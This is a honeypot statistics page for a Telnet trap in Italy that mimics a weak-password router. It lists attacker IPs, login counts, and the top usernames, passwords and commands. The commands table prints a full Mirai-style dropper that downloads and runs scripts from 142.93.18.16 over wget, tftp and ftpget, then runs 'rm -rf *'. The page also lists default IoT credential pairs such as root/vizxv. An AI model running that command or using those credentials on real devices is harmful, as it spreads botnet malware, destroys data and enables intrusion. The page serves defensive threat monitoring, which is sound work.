Honeypot Telnet

This page is updated daily. Last update: 2019-02-15 23:09:07 UTC

The following Telnet blacklists (updated daily, in text format) contain the IP addresses of hosts that tried to brute-force their way into my honeypot, located in Italy.
The honeypot simulates a home router with a weak password and the most common commands.
Monthly Telnet login attempts

Attackers blacklists (IP address)

24 hours (txt), week (txt), year (txt)

Other information

All passwords ordered by length (txt)
HTTP urls collected (txt)
Monthly connections (txt)

Statistics - 2019

Unique IP address: 315
Unique username: 85
Unique password: 295

Latest commands executed

Timestamp | Command | IP address | AS | AS Org | Country
2019-01-05 | enable | 186.179.154.61 | 27775 | Telecommunicationcompany ... | SR
2019-01-05 | enable | 87.14.208.224 | 3269 | ASN-IBSNAZ, IT | IT
2019-01-05 | enable | 186.179.154.61 | 27775 | Telecommunicationcompany ... | SR
2019-01-05 | enable | 186.179.154.61 | 27775 | Telecommunicationcompany ... | SR
2019-01-05 | enable | 186.179.154.61 | 27775 | Telecommunicationcompany ... | SR
2019-01-05 | enable | 157.230.8.12 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | UNK
2019-01-05 | enable | 87.14.30.92 | 3269 | ASN-IBSNAZ, IT | IT
2019-01-05 | enable | 186.179.167.112 | 27775 | Telecommunicationcompany ... | SR
2019-01-05 | enable | 74.93.73.169 | 7922 | COMCAST-7922 Comcast Cabl... | US
2019-01-05 | enable | 183.245.115.36 | 56041 | CMNET-ZHEJIANG-AP China M... | CN

Most sessions per distinct IP address - 2019

IP Address | AS | AS Org | Country
142.93.158.209 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | UNK
87.119.65.98 | 47771 | ENTRY-BG-AS, BG | BG
31.163.48.230 | 12389 | ROSTELECOM-AS, RU | RU
178.46.0.56 | 12389 | ROSTELECOM-AS, RU | RU
207.194.215.60 | 25668 | CIPHERKEY Cipherkey Exchange Corp., CA | CA
60.5.169.67 | 4837 | CHINA169-BACKBONE CHINA U... | CN
81.230.96.43 | 3301 | TELIANET-SWEDEN Telia Company, SE | SE
223.18.221.29 | 9304 | HUTCHISON-AS-AP HGC Globa... | HK
103.84.144.30 | 55699 | STARNET-AS-ID PT. Cemerla... | UNK
188.17.9.234 | 12389 | ROSTELECOM-AS, RU | RU

Login attempts last 10 days

Date | Occurrences
2019-01-05 | 1243
2019-01-04 | 2587
2019-01-03 | 2570
2019-01-02 | 1896
2019-01-01 | 2307
2018-12-31 | 2131
2018-12-30 | 2601
2018-12-29 | 1921
2018-12-28 | 1933
2018-12-27 | 2

Top username - 2019

Username
enable
shell
root
admin
sh
wlahh
default
guest
support
+

Top password - 2019

Password
system
sh
bah
linuxshell
admin
1111
default
12345
123456
password

Top username/password - 2019

Username / Password
enable / system
shell / sh
shell / bah
wlahh / linuxshell
admin / admin
root / vizxv
default / S2fGqNFs
guest / 12345
=&+""N / =&N
+ / ,"+N

Top commands - 2019

Command
enable
enable
start
+ /,"+N
sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://142.93.18.16/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 142.93.18.16 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 142.93.18.16; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 142.93.18.16 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
shell

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes